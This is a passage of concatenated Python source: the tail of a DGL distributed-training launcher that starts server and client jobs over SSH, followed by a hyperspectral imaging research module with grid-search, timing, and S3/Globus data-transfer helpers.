suffix_optional_envvars=suffix_optional_envvars, ) def wrap_cmd_with_local_envvars(cmd: str, env_vars: str) -> str: """Wraps a CLI command with desired env vars with the following properties: (1) env vars persist for the entire `cmd`, even if it consists of multiple "chained" commands like: cmd = "ls && pwd && python run/something.py" (2) env vars don't pollute the environment after `cmd` completes. Example: >>> cmd = "ls && pwd" >>> env_vars = "VAR1=value1 VAR2=value2" >>> wrap_cmd_with_local_envvars(cmd, env_vars) "(export VAR1=value1 VAR2=value2; ls && pwd)" Args: cmd: env_vars: A string containing env vars, eg "VAR1=val1 VAR2=val2" Returns: cmd_with_env_vars: """ # use `export` to persist env vars for entire cmd block. required if udf_command is a chain of commands # also: wrap in parens to not pollute env: # https://stackoverflow.com/a/45993803 return f"(export {env_vars}; {cmd})" def wrap_cmd_with_extra_envvars(cmd: str, env_vars: list) -> str: """Wraps a CLI command with extra env vars Example: >>> cmd = "ls && pwd" >>> env_vars = ["VAR1=value1", "VAR2=value2"] >>> wrap_cmd_with_extra_envvars(cmd, env_vars) "(export VAR1=value1 VAR2=value2; ls && pwd)" Args: cmd: env_vars: A list of strings containing env vars, e.g., ["VAR1=value1", "VAR2=value2"] Returns: cmd_with_env_vars: """ env_vars = " ".join(env_vars) return wrap_cmd_with_local_envvars(cmd, env_vars) def submit_jobs(args, udf_command): """Submit distributed jobs (server and client processes) via ssh""" hosts = [] thread_list = [] server_count_per_machine = 0 # Get the IP addresses of the cluster. ip_config = os.path.join(args.workspace, args.ip_config) with open(ip_config) as f: for line in f: result = line.strip().split() if len(result) == 2: ip = result[0] port = int(result[1]) hosts.append((ip, port)) elif len(result) == 1: ip = result[0] port = DEFAULT_PORT hosts.append((ip, port)) else: raise RuntimeError("Format error of ip_config.") server_count_per_machine = args.num_servers # Get partition info of the graph data part_config = os.path.join(args.workspace, args.part_config) with open(part_config) as conf_f: part_metadata = json.load(conf_f) assert 'num_parts' in part_metadata, 'num_parts does not exist.' # The number of partitions must match the number of machines in the cluster. assert part_metadata['num_parts'] == len(hosts), \ 'The number of graph partitions has to match the number of machines in the cluster.' 
tot_num_clients = args.num_trainers * (1 + args.num_samplers) * len(hosts) # launch server tasks server_env_vars = construct_dgl_server_env_vars( num_samplers=args.num_samplers, num_server_threads=args.num_server_threads, tot_num_clients=tot_num_clients, part_config=args.part_config, ip_config=args.ip_config, num_servers=args.num_servers, graph_format=args.graph_format, pythonpath=os.environ.get("PYTHONPATH", ""), ) for i in range(len(hosts) * server_count_per_machine): ip, _ = hosts[int(i / server_count_per_machine)] server_env_vars_cur = f"{server_env_vars} DGL_SERVER_ID={i}" cmd = wrap_cmd_with_local_envvars(udf_command, server_env_vars_cur) cmd = wrap_cmd_with_extra_envvars(cmd, args.extra_envs) if len(args.extra_envs) > 0 else cmd cmd = 'cd ' + str(args.workspace) + '; ' + cmd thread_list.append(execute_remote(cmd, ip, args.ssh_port, username=args.ssh_username)) # launch client tasks client_env_vars = construct_dgl_client_env_vars( num_samplers=args.num_samplers, tot_num_clients=tot_num_clients, part_config=args.part_config, ip_config=args.ip_config, num_servers=args.num_servers, graph_format=args.graph_format, num_omp_threads=os.environ.get("OMP_NUM_THREADS", str(args.num_omp_threads)), pythonpath=os.environ.get("PYTHONPATH", ""), ) for node_id, host in enumerate(hosts): ip, _ = host # Transform udf_command to follow torch's dist launcher format: `PYTHON_BIN -m torch.distributed.launch ... UDF` torch_dist_udf_command = wrap_udf_in_torch_dist_launcher( udf_command=udf_command, num_trainers=args.num_trainers, num_nodes=len(hosts), node_rank=node_id, master_addr=hosts[0][0], master_port=1234, ) cmd = wrap_cmd_with_local_envvars(torch_dist_udf_command, client_env_vars) cmd = wrap_cmd_with_extra_envvars(cmd, args.extra_envs) if len(args.extra_envs) > 0 else cmd cmd = 'cd ' + str(args.workspace) + '; ' + cmd thread_list.append(execute_remote(cmd, ip, args.ssh_port, username=args.ssh_username)) # Start a cleanup process dedicated for cleaning up remote training jobs. conn1,conn2 = multiprocessing.Pipe() func = partial(get_all_remote_pids, hosts, args.ssh_port, udf_command) process = multiprocessing.Process(target=cleanup_proc, args=(func, conn1)) process.start() def signal_handler(signal, frame): logging.info('Stop launcher') # We need to tell the cleanup process to kill remote training jobs. conn2.send('cleanup') sys.exit(0) signal.signal(signal.SIGINT, signal_handler) for thread in thread_list: thread.join() # The training processes complete. We should tell the cleanup process to exit. conn2.send('exit') process.join() def main(): parser = argparse.ArgumentParser(description='Launch a distributed job') parser.add_argument('--ssh_port', type=int, default=22, help='SSH Port.') parser.add_argument( "--ssh_username", default="", help="Optional. When issuing commands (via ssh) to cluster, use the provided username in the ssh cmd. " "Example: If you provide --ssh_username=bob, then the ssh command will be like: 'ssh bob@1.2.3.4 CMD' " "instead of 'ssh 1.2.3.4 CMD'" ) parser.add_argument('--workspace', type=str, help='Path of user directory of distributed tasks. 
\ This is used to specify a destination location where \ the contents of current directory will be rsyncd') parser.add_argument('--num_trainers', type=int, help='The number of trainer processes per machine') parser.add_argument('--num_omp_threads', type=int, help='The number of OMP threads per trainer') parser.add_argument('--num_samplers', type=int, default=0, help='The number of sampler processes per trainer process') parser.add_argument('--num_servers', type=int, help='The number of server processes per machine') parser.add_argument('--part_config', type=str, help='The file (in workspace) of the partition config') parser.add_argument('--ip_config', type=str, help='The file (in workspace) of IP configuration for server processes') parser.add_argument('--num_server_threads', type=int, default=1, help='The number of OMP threads in the server process. \ It should be small if server processes and trainer processes run on \ the same machine. By default, it is 1.') parser.add_argument('--graph_format', type=str, default='csc', help='The format of the graph structure of each partition. \ The allowed formats are csr, csc and coo. A user can specify multiple \ formats, separated by ",". For example, the graph format is "csr,csc".') parser.add_argument('--extra_envs', nargs='+', type=str, default=[], help='Extra environment parameters need to be set. For example, \ you can set the LD_LIBRARY_PATH and NCCL_DEBUG by adding: \ --extra_envs LD_LIBRARY_PATH=/usr/local/cuda/lib64:$LD_LIBRARY_PATH NCCL_DEBUG=INFO ') args, udf_command = parser.parse_known_args() assert len(udf_command) == 1, 'Please provide user command line.' assert args.num_trainers is not None and args.num_trainers > 0, \ '--num_trainers must be a positive number.' assert args.num_samplers is not None and args.num_samplers >= 0, \ '--num_samplers must be a non-negative number.' assert args.num_servers is not None and args.num_servers > 0, \ '--num_servers must be a positive number.' assert args.num_server_threads > 0, '--num_server_threads must be a positive number.' assert args.workspace is not None, 'A user has to specify a workspace with --workspace.' assert args.part_config is not None, \ 'A user has to specify a partition configuration file with --part_config.' assert args.ip_config is not None, \ 'A user has to specify an IP configuration file with --ip_config.' if args.num_omp_threads is None: # Here we assume all machines have the same number of CPU cores as the machine # where the launch script runs. args.num_omp_threads = max(multiprocessing.cpu_count() // 2 // args.num_trainers, 1) print('The number of OMP threads per trainer is set to', args.num_omp_threads) udf_command = str(udf_command[0]) if 'python' not in udf_command: raise RuntimeError("DGL launching script can only support Python executable file.") submit_jobs(args, udf_command) if __name__ == '__main__': fmt = '%(asctime)s %(levelname)s %(message)s' logging.basicConfig(format=fmt, level=logging.INFO) main()
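# --- Example (sketch): what the torch launcher prefix looks like ---
# Values below are illustrative only. Given 2 nodes with 4 trainers each,
# node 0 gets the following prefix injected after its python binary:
#
#   >>> construct_torch_dist_launcher_cmd(
#   ...     num_trainers=4, num_nodes=2, node_rank=0,
#   ...     master_addr="192.168.0.1", master_port=1234)
#   '-m torch.distributed.launch --nproc_per_node=4 --nnodes=2 --node_rank=0 --master_addr=192.168.0.1 --master_port=1234'
#
# A hypothetical end-to-end invocation (workspace, config files, and trainer
# script are assumptions, not part of this tool):
#
#   python3 launch.py --workspace /home/user/dgl_workspace \
#       --num_trainers 4 --num_samplers 1 --num_servers 1 \
#       --part_config data/graph.json --ip_config ip_config.txt \
#       "python3 train_dist.py"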
sip_functions.py
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 11:35:45 2020

@author: nigo0024
"""
from ast import literal_eval
from copy import deepcopy
import fnmatch
import itertools as it
import math
import numpy as np
import os
import geopandas as gpd
import pandas as pd
import pathlib
import sys
import time

from hs_process import batch

from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.model_selection import train_test_split
from sklearn.linear_model import Lasso
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
from sklearn.cross_decomposition import PLSRegression
from sklearn.feature_selection import SelectFromModel
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import StratifiedKFold
from sklearn.impute import KNNImputer
from sklearn.experimental import enable_iterative_imputer
from sklearn.impute import IterativeImputer
from sklearn.preprocessing import PowerTransformer
from sklearn.compose import TransformedTargetRegressor
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_squared_log_error
from sklearn.metrics import r2_score
from scipy.stats import rankdata

import warnings
from sklearn.utils._testing import ignore_warnings
from sklearn.exceptions import ConvergenceWarning

# Plotting
from sklearn.linear_model import LinearRegression
from matplotlib import pyplot as plt
import seaborn as sns
import matplotlib.lines as mlines
import matplotlib.patches as mpatches
from matplotlib.ticker import MaxNLocator
import matplotlib.ticker
from matplotlib.ticker import FormatStrFormatter

from datetime import datetime
import subprocess
import globus_sdk

from extended_text_box import BoxStyle
from extended_text_box import ExtendedTextBox

from concurrent.futures import ProcessPoolExecutor
from multiprocessing import Manager

# In[File management functions]
def hs_grid_search(hs_settings, msi_run_id, dir_out=None):
    '''
    Reads ``hs_settings`` and returns a dataframe with all the necessary
    information to execute each specific processing scenario. This enables
    searching over any number of image processing scenarios.

    Folder name will be the index of df_grid for each set of outputs, so
    df_grid must be referenced to know which folder corresponds to which
    scenario.
    '''
    df_grid = pd.DataFrame(columns=hs_settings.keys())
    keys = hs_settings.keys()
    values = (hs_settings[key] for key in keys)
    combinations = [dict(zip(keys, combination))
                    for combination in it.product(*values)]
    for i in combinations:
        data = []
        for col in df_grid.columns:
            data.append(i[col])
        df_temp = pd.DataFrame(data=[data], columns=df_grid.columns)
        # DataFrame.append() was removed in pandas 2.x; concat is equivalent.
        df_grid = pd.concat([df_grid, df_temp])
    df_grid = df_grid.reset_index(drop=True)
    if dir_out is not None and os.path.isdir(dir_out):
        df_grid.to_csv(os.path.join(
            dir_out, 'msi_' + str(msi_run_id) + '_hs_settings.csv'),
            index=True)
    return df_grid
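# --- Example (sketch): building the scenario grid ---
# The keys and values below are illustrative assumptions; real runs use the
# full settings dict (dir_panels, crop, clip, smooth, bin, segment).
#
#   >>> hs_settings = {'clip': [None, {'wl_bands': [[0, 420], [880, 1000]]}],
#   ...                'smooth': [None, {'window_size': 11, 'order': 2}]}
#   >>> df_grid = hs_grid_search(hs_settings, msi_run_id=0)
#   >>> len(df_grid)  # Cartesian product: 2 clip x 2 smooth options
#   4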
def get_idx_grid(dir_results_msi, msi_run_id, idx_min=0):
    '''
    Finds the index of the processing scenario based on files written to
    disk.

    The problem I have is that after 10 loops, I am running into a
    MemoryError. I am not sure why this is, but one thing I can try is to
    restart the Python instance and begin the script from the beginning after
    every main loop. However, I must determine which processing scenario I am
    currently on based on the files written to disk.

    Parameters:
        dir_results_msi: directory to search
        msi_run_id:
        idx_min: The minimum idx_grid to return (e.g., if idx_min=100, then
            idx_grid will be forced to be at least 100; it will be higher if
            other folders already exist and processing has been performed)
    '''
    folders_all = [f for f in os.listdir(dir_results_msi)
                   if os.path.isdir(os.path.join(dir_results_msi, f))]
    folders_out = []
    idx_list = []
    str_match = 'msi_' + str(msi_run_id) + '_'  # eligible folders must have this in their name
    for f in folders_all:
        if str_match in f:
            idx_grid1 = int(f.replace(str_match, ''))
            if idx_grid1 >= idx_min:
                idx_list.append(idx_grid1)
                folders_out.append(f)
    if len(idx_list) == 0:
        return idx_min
    for idx_grid2 in range(idx_min, max(idx_list)+2):
        if idx_grid2 not in idx_list:
            break
    return idx_grid2


def grid_n_levels(df_grid):
    n_clip = len(df_grid['clip'].unique())
    n_smooth = len(df_grid['smooth'].unique())
    n_bin = len(df_grid['bin'].unique())
    n_segment = len(df_grid['segment'].unique())
    return n_clip, n_smooth, n_bin, n_segment


def clean_df_grid(df_grid):
    scenarios = [(idx, row_n, proc_step)
                 for idx, row_n in df_grid.iterrows()
                 for proc_step in ['clip', 'smooth', 'bin', 'segment']]
    for idx, row_n, proc_step in scenarios:
        try:
            df_grid.loc[idx][proc_step] = literal_eval(row_n[proc_step])
        except ValueError:
            pass
    return df_grid


def recurs_dir(base_dir, search_ext='.bip', level=None):
    '''
    Searches all folders and subfolders recursively within <base_dir>
    for filetypes of <search_ext>.
    Returns sorted <out_files>, a list of full path strings of each result.

    Parameters:
        base_dir: directory path that should include files to be returned
        search_ext: file format/extension to search for in all directories
            and subdirectories
        level: how many levels to search; if None, searches all levels

    Returns:
        out_files: include the full pathname, filename, and ext of all
            files that have ``search_ext`` in their name.
    '''
    # Note: the original decremented ``level`` but never passed it to the
    # recursive call, so the depth limit had no effect; pass it down so the
    # limit actually applies (None still means unlimited depth).
    if level is not None:
        level -= 1
    d_str = os.listdir(base_dir)
    out_files = []
    for item in d_str:
        full_path = os.path.join(base_dir, item)
        if not os.path.isdir(full_path) and item.endswith(search_ext):
            out_files.append(full_path)
        elif os.path.isdir(full_path) and (level is None or level >= 0):
            new_dir = full_path  # If dir, then search in that
            out_files_temp = recurs_dir(new_dir, search_ext, level)
            if out_files_temp:  # if list is not empty
                out_files.extend(out_files_temp)  # add items
    return sorted(out_files)


def retrieve_files(data_dir, panel_type, crop_type):
    '''
    Gets all the necessary files to be used in this scenario.

    Returns:
        df_crop (``pandas.DataFrame``): a dataframe containing all the
            cropping instructions for all the input datacubes
    '''
    fname_crop_info = os.path.join(data_dir, crop_type + '.csv')
    df_crop = pd.read_csv(fname_crop_info)
    df_crop['date'] = pd.to_datetime(df_crop['date'])
    df_crop['directory'] = df_crop.apply(lambda row: os.path.join(
        row['directory'], panel_type), axis=1)
    gdf_wells_fname = os.path.join(data_dir, 'plot_bounds_wells.geojson')
    gdf_aerf_fname = os.path.join(data_dir, 'aerf_whole_field_sample_locs.geojson')
    gdf_wells = gpd.read_file(gdf_wells_fname)
    gdf_aerf = gpd.read_file(gdf_aerf_fname)
    return df_crop, gdf_wells, gdf_aerf


def convert_size(size_bytes):
    if size_bytes == 0:
        return "0B"
    size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
    i = int(math.floor(math.log(size_bytes, 1024)))
    p = math.pow(1024, i)
    s = round(size_bytes / p, 2)
    return "%s %s" % (s, size_name[i])
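# --- Example: human-readable file sizes ---
# A quick sanity check of the helper above:
#
#   >>> convert_size(0)
#   '0B'
#   >>> convert_size(1536)
#   '1.5 KB'
#   >>> convert_size(3 * 1024**3)
#   '3.0 GB'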
def unique_datacubes(df_crop):
    '''
    Returns a list of unique datacubes from df_crop.
    '''
    fname_list = []
    for idx, row in df_crop.iterrows():
        fname = os.path.join(row['directory'],
                             row['name_short'] + row['name_long'] + row['ext'])
        if fname not in fname_list:
            fname_list.append(fname)
    df_files = pd.DataFrame(columns=['filename', 'size'])
    for fname in fname_list:
        if os.path.isfile(fname):
            data = [fname, os.path.getsize(fname)]
            df_temp = pd.DataFrame(data=[data], columns=df_files.columns)
            df_files = pd.concat([df_files, df_temp])  # append() removed in pandas 2.x
    print('Total number of datacubes to crop: {0}'.format(len(df_files)))
    print('Total file size: {0}\n'.format(convert_size(df_files['size'].sum())))
    return fname_list  # return the list promised by the docstring


def check_processing(dir_out, ext='.bip', n_files=833):
    '''
    Checks directory; if it doesn't exist, it is created; if processing is
    finished, True is returned to indicate this step can be skipped.
    '''
    if not os.path.isdir(dir_out):
        pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True)
        skip = False
    elif len(fnmatch.filter(os.listdir(dir_out), '*' + ext)) >= n_files:
        skip = True  # directory exists and contains many files; clipping was already done
    else:
        skip = False  # directory exists, but clipping was not completed
    return skip


def get_msi_segment_dir(row, level='segment'):
    '''
    Gets the msi directory equivalent of the directory where the .spec and
    other files are located following segmentation. These will be transferred
    to 2nd tier storage after testing/plotting.

    Parameters:
        row (``pd.Series``):
    '''
    panel_type = row['dir_panels']
    crop_type = row['crop']
    clip_type, _ = get_clip_type(row)
    smooth_type, _, _ = get_smooth_type(row)
    bin_type, _, _, _ = get_bin_type(row)
    segment_type, _, _, _, _, _, _ = get_segment_type(row)
    if level == 'segment':
        msi_seg_dir = '/'.join((panel_type, crop_type, clip_type, smooth_type,
                                bin_type, segment_type))
    elif level == 'bin':
        msi_seg_dir = '/'.join((panel_type, crop_type, clip_type, smooth_type,
                                bin_type))
    elif level == 'smooth':
        msi_seg_dir = '/'.join((panel_type, crop_type, clip_type, smooth_type))
    elif level == 'clip':
        msi_seg_dir = '/'.join((panel_type, crop_type, clip_type))
    elif level == 'crop':
        msi_seg_dir = '/'.join((panel_type, crop_type))
    return msi_seg_dir


def tier2_data_transfer(dir_base, row):
    '''
    Actually transfers the data to MSI 2nd tier storage.

    I think this may take quite some time, so it should always be used in a
    parallelized way.

    Parameters:
        row (``pd.Series``):
    '''
    msi_seg_dir = get_msi_segment_dir(row)
    # The original referenced an undefined ``mis_seg_dir2``; ``msi_seg_dir``
    # appears to be what was intended. Note that s3cmd URIs use 's3://'.
    tier2_dir = os.path.join('s3://', msi_seg_dir)
    subprocess.call(['s3cmd', 'put', '-r',
                     os.path.join(dir_base, msi_seg_dir), tier2_dir])
    subprocess.call(['rm', '-r', os.path.join(dir_base, msi_seg_dir)])


def tier2_results_transfer(dir_base, msi_result_dir,
                           globus_client_id='684eb60a-9c5e-48af-929d-0880fd829173'):
    '''
    Transfers results from the msi_0_000 folder from high performance storage
    to 2nd tier storage.

    Note: ``dir_base`` was referenced but never defined in the original
    signature, so it is added here as a parameter.
    '''
    tier2_dir = os.path.join('s3://results', msi_result_dir)
    subprocess.call(['s3cmd', 'put', '-r',
                     os.path.join(dir_base, msi_result_dir), tier2_dir])
    subprocess.call(['rm', '-r', os.path.join(dir_base, msi_result_dir)])


def get_globus_data_dir(dir_base, msi_run_id, row,
                        msi_base='/home/yangc1/public', level='segment'):
    '''
    Gets the data directory to transfer all files.

    Parameters:
        level (``str``): The data directory level to transfer; must be one of
            ['segment', 'bin', 'smooth', 'clip', 'crop'].
    '''
    msi_seg_dir = get_msi_segment_dir(row, level=level)
    dest_base_dir = os.path.basename(dir_base) + '_msi_run_' + str(msi_run_id)
    dir_source_data = '/'.join(
        (msi_base, os.path.basename(dir_base), 'data', msi_seg_dir + '/'))
    dir_dest_data = '/'.join(
        ('/' + dest_base_dir, 'data', msi_seg_dir + '/'))
    return dir_source_data, dir_dest_data


def get_globus_results_dir(dir_base, msi_run_id, row,
                           msi_base='/home/yangc1/public'):
    label_base = 'msi_' + str(msi_run_id) + '_' + str(row.name).zfill(3)
    dest_base_dir = os.path.basename(dir_base) + '_msi_run_' + str(msi_run_id)
    dir_source_results = '/'.join(
        (msi_base, os.path.basename(dir_base), 'results',
         'msi_' + str(msi_run_id) + '_results', label_base + '/'))
    dir_dest_results = '/'.join(
        ('/' + dest_base_dir, 'results',
         'msi_' + str(msi_run_id) + '_results', label_base + '/'))
    return dir_source_results, dir_dest_results


def globus_autoactivate(tc, endpoint, if_expires_in=7200):
    r = tc.endpoint_autoactivate(endpoint, if_expires_in=if_expires_in)
    if r["code"] == "AutoActivationFailed":
        print("Endpoint requires manual activation, please open "
              "the following URL in a browser to activate the "
              "endpoint:")
        print("https://app.globus.org/file-manager?origin_id=%s" % endpoint)


def globus_transfer(dir_source_data, dir_dest_data, TRANSFER_REFRESH_TOKEN,
                    client, TRANSFER_TOKEN, delete_only=None, label=None,
                    source_endpoint='d865fc6a-2db3-11e6-8070-22000b1701d1',
                    dest_endpoint='fb6f1c6b-86b1-11e8-9571-0a6d4e044368'):
    '''
    Transfers results from the msi_0_000 folder from high performance storage
    to 2nd tier storage using the GLOBUS Python SDK API.

    This required some setup (see "globus_token.py"):

    dir_source_data = '/home/yangc1/public/hs_process/results/msi_1_results/'
    dir_dest_data = 'hs_process/results/msi_1_results'
    '''
    # First, get the transfer client using access tokens
    authorizer = globus_sdk.RefreshTokenAuthorizer(
        TRANSFER_REFRESH_TOKEN, client, access_token=TRANSFER_TOKEN)
    tc = globus_sdk.TransferClient(authorizer=authorizer)
    globus_autoactivate(tc, source_endpoint)
    globus_autoactivate(tc, dest_endpoint)

    submission_id = None
    # see: https://globus-sdk-python.readthedocs.io/en/stable/clients/transfer/#helper-objects
    tdata = globus_sdk.TransferData(  # initialize data transfer
        tc, source_endpoint=source_endpoint,
        destination_endpoint=dest_endpoint, label=label,
        submission_id=submission_id, sync_level=2, verify_checksum=False,
        preserve_timestamp=False, encrypt_data=False, deadline=None,
        recursive_symlinks='ignore')
    tdata.add_item(dir_source_data, dir_dest_data, recursive=True)  # add directory

    transfer_result, delete_result = None, None
    if not delete_only:  # transfer unless delete_only is explicitly True
        transfer_result = tc.submit_transfer(tdata)
        print("GLOBUS TRANSFER task_id:", transfer_result["task_id"])
        print('Waiting for transfer {0} to complete...'
              ''.format(transfer_result['task_id']))
        c = it.count(1)
        while not tc.task_wait(transfer_result['task_id'], timeout=60):
            count = next(c)
            print('Transfer {0} has not yet finished; transfer submitted {1} '
                  'minute(s) ago'.format(transfer_result['task_id'], count))
            if count >= 6:
                print('Cancelling task after {0} minutes.'.format(count))
                tc.cancel_task(transfer_result['task_id'])
            if count >= 8:
                print('Looks like I have to break out of the while loop.')
                break
        print('DONE.')
    if delete_only is not None:  # delete when delete_only is True or False
        ddata = globus_sdk.DeleteData(tc, source_endpoint, recursive=True)
        ddata.add_item(dir_source_data)
        delete_result = tc.submit_delete(ddata)
        print("GLOBUS DELETE task_id:", delete_result['task_id'])
    return transfer_result, delete_result


def restart_script():
    print("argv was", sys.argv)
    print("sys.executable was", sys.executable)
    print("restart now")
    os.execv(sys.executable, ['python', __file__] + sys.argv[1:])


def save_n_obs(dir_results_meta, df_join, msi_run_id, grid_idx, y_label, feat):
    fname = os.path.join(dir_results_meta, 'msi_{0}_n_observations.csv'
                         ''.format(msi_run_id))
    if not os.path.exists(fname):
        with open(fname, 'w+') as f:
            f.write('msi_run_id, grid_idx, y_label, feature, obs_n\n')
    with open(fname, 'a+') as f:
        f.write('{0}, {1}, {2}, {3}, {4}\n'
                ''.format(msi_run_id, grid_idx, y_label, feat, len(df_join)))


# In[Timing functions]
def time_setup_img(dir_out, msi_run_id):
    '''
    Sets up the times dictionary and saves it to file; every loop appends a
    new row.
    '''
    cols = ['msi_run_id', 'grid_idx', 'n_jobs', 'time_start', 'time_end',
            'time_total', 'crop', 'clip', 'smooth', 'bin', 'segment']
    pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True)
    fname_times = os.path.join(dir_out, 'msi_' + str(msi_run_id) + '_time_imgproc.csv')
    if not os.path.isfile(fname_times):
        df_times = pd.DataFrame(columns=cols)
        df_times.to_csv(fname_times, index=False)
    time_dict = {i: [None] for i in cols}
    return time_dict


def time_setup_training(dir_out, msi_run_id):
    '''
    Sets up the times dictionary and saves it to file; every loop appends a
    new row.
    '''
    cols = ['n_jobs', 'msi_run_id', 'grid_idx', 'y_label', 'feats',
            'time_start', 'time_end', 'time_total',
            'load_ground', 'load_spec', 'join_data', 'feat_sel', 'tune',
            'test', 'plot']
    pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True)
    fname_times = os.path.join(dir_out, 'msi_' + str(msi_run_id) + '_time_train.csv')
    if not os.path.isfile(fname_times):
        df_times = pd.DataFrame(columns=cols)
        df_times.to_csv(fname_times, index=False)
    time_dict = {i: [None] for i in cols}
    return time_dict


def append_times(dir_out, time_dict, msi_run_id):
    '''
    Appends time info to the 'runtime.csv' in ``dir_out``.

    Parameters:
        time_dict (``dict``): contains the time delta or datetime string to
            be written to each .csv column
    '''
    time_end = datetime.now()
    time_dict['time_end'] = [str(time_end)]
    time_start = datetime.strptime(
        time_dict['time_start'][0], '%Y-%m-%d %H:%M:%S.%f')
    time_total = time_end - time_start
    time_dict['time_total'] = [str(time_total)]
    if 'segment' in time_dict.keys():
        fname = 'msi_' + str(msi_run_id) + '_time_imgproc.csv'
    else:
        fname = 'msi_' + str(msi_run_id) + '_time_train.csv'
    fname_times = os.path.join(dir_out, fname)
    df_time = pd.DataFrame.from_dict(time_dict)
    df_time.to_csv(fname_times, header=False, mode='a', index=False)
    time_dict_null = dict.fromkeys(time_dict.keys(), [None])
    return time_dict_null


def time_loop_init(time_dict, msi_run_id, grid_idx, n_jobs):
    '''
    Initialization function for keeping track of time. Returns
    ``time_dict``, which will hold the time delta or datetime string for
    each step in the script.
    '''
    time_start = datetime.now()
    time_dict['n_jobs'] = [n_jobs]
    time_dict['msi_run_id'] = [msi_run_id]
    time_dict['grid_idx'] = [grid_idx]
    time_dict['time_start'] = [str(time_start)]
    return time_dict, time_start


def time_step(time_dict, key, time_last):
    '''
    Calculates the time since ``time_last`` and adds it to ``time_dict`` for
    the appropriate key.
    '''
    time_new = datetime.now()
    time_dif = time_new - time_last
    time_dict[key] = [str(time_dif)]
    return time_dict, time_new


# In[Count processed image functions]
def proc_files_count_setup(dir_out, msi_run_id):
    '''
    Sets up the processed-files dictionary and saves it to file; every loop
    appends a new row.
    '''
    cols = ['n_jobs', 'msi_run_id', 'grid_idx', 'processed']
    pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True)
    fname_n_files = os.path.join(dir_out, 'msi_' + str(msi_run_id) + '_imgproc_n_files.csv')
    if not os.path.isfile(fname_n_files):
        df_proc = pd.DataFrame(columns=cols)
        df_proc.to_csv(fname_n_files, index=False)
    proc_dict = {i: [None] for i in cols}
    return proc_dict


def proc_files_count(proc_dict, n_jobs, msi_run_id, key, dir_data, row,
                     ext='.spec'):
    '''
    Counts the files processed so far and adds the count to ``proc_dict``
    for the appropriate key.
    '''
    proc_dict['n_jobs'] = [n_jobs]
    proc_dict['msi_run_id'] = [msi_run_id]
    # dir_data has to be explicit if we're going to do this for every single level..
    n_files_proc = len(fnmatch.filter(os.listdir(
        get_spec_data(dir_data, row, feat='reflectance')), '*' + ext))
    proc_dict[key] = [n_files_proc]
    return proc_dict, n_files_proc


def proc_files_append(dir_out, proc_dict, msi_run_id):
    '''
    Appends the processed-file counts to '_imgproc_n_files.csv' in
    ``dir_out``.

    Parameters:
        proc_dict (``dict``): contains the n processed files to be written to
            each .csv column
    '''
    fname = 'msi_' + str(msi_run_id) + '_imgproc_n_files.csv'
    fname_n_files = os.path.join(dir_out, fname)
    df_proc = pd.DataFrame.from_dict(proc_dict)
    df_proc.to_csv(fname_n_files, header=False, mode='a', index=False)
    proc_dict_null = dict.fromkeys(proc_dict.keys(), [None])
    return proc_dict_null


# In[Image processing functions]
def print_details(row):
    print('\nProcessing scenario ID: {0}'.format(row.name))
    print('Panels type: {0}'.format(row['dir_panels']))
    print('Crop type: {0}'.format(row['crop']))
    print('Clip type: {0}'.format(row['clip']))
    print('Smooth type: {0}'.format(row['smooth']))
    print('Bin type: {0}'.format(row['bin']))
    print('Segment type: {0}'.format(row['segment']))


def get_clip_type(row):
    '''
    Determines the clip type being used in this scenario (and updates
    wl_bands accordingly).

    Parameters:
        row (``pd.Series``):
    '''
    if pd.isnull(row['clip']):
        clip_type = 'clip_none'
        wl_bands = row['clip']
    elif len(row['clip']['wl_bands']) == 2:
        clip_type = 'clip_ends'
        wl_bands = row['clip']['wl_bands']
    elif len(row['clip']['wl_bands']) == 4:
        clip_type = 'clip_all'
        wl_bands = row['clip']['wl_bands']
    return clip_type, wl_bands


def get_smooth_type(row):
    '''
    Determines the smooth type being used in this scenario and returns window
    size and order for use in file names, etc.
    '''
    if pd.isnull(row['smooth']):
        smooth_type = 'smooth_none'
        window_size = row['smooth']
        order = row['smooth']
    else:
        window_size = row['smooth']['window_size']
        order = row['smooth']['order']
        smooth_type = 'smooth_window_{0}'.format(window_size)
    return smooth_type, window_size, order


def get_bin_type(row):
    '''
    Determines the bin type being used in this scenario (and updates
    accordingly).

    Parameters:
        row (``pd.Series``):
    '''
    if pd.isnull(row['bin']):
        method_bin = None
    else:
        method_bin = row['bin']['method']
    if method_bin == 'spectral_mimic':
        sensor = row['bin']['sensor']
        bandwidth = None
        bin_type = 'bin_mimic_{0}'.format(sensor.replace('-', '_'))
    elif method_bin == 'spectral_resample':
        sensor = None
        bandwidth = row['bin']['bandwidth']
        bin_type = 'bin_resample_{0}nm'.format(bandwidth)
    else:
        sensor = None
        bandwidth = None
        bin_type = 'bin_none'
    return bin_type, method_bin, sensor, bandwidth


def get_segment_type(row):
    '''
    Determines the segment type being used in this scenario and returns other
    relevant information for use in file names, etc.
    '''
    if pd.isnull(row['segment']):
        method = None
        wl1 = None
        wl2 = None
        wl3 = None
        mask_percentile = None
        mask_side = None
        segment_type = 'seg_none'
    elif row['segment']['method'] == 'mcari2':
        method = row['segment']['method']
        wl1 = row['segment']['wl1']
        wl2 = row['segment']['wl2']
        wl3 = row['segment']['wl3']
        mask_percentile = row['segment']['mask_percentile']
        mask_side = row['segment']['mask_side']
        if isinstance(mask_percentile, list):
            mask_pctl_print = '_'.join([str(x) for x in mask_percentile])
            segment_type = 'seg_{0}_{1}_{2}'.format(
                method, mask_pctl_print, get_side_inverse(mask_side))
        else:
            segment_type = 'seg_{0}_{1}_{2}'.format(
                method, mask_percentile, get_side_inverse(mask_side))
    elif row['segment']['method'] == 'ndi':
        method = row['segment']['method']
        wl1 = row['segment']['wl1']
        wl2 = row['segment']['wl2']
        wl3 = None
        mask_percentile = row['segment']['mask_percentile']
        mask_side = row['segment']['mask_side']
        if isinstance(mask_percentile, list):
            mask_pctl_print = '_'.join([str(x) for x in mask_percentile])
            segment_type = 'seg_{0}_{1}_{2}'.format(
                method, mask_pctl_print, get_side_inverse(mask_side))
        else:
            segment_type = 'seg_{0}_{1}_{2}'.format(
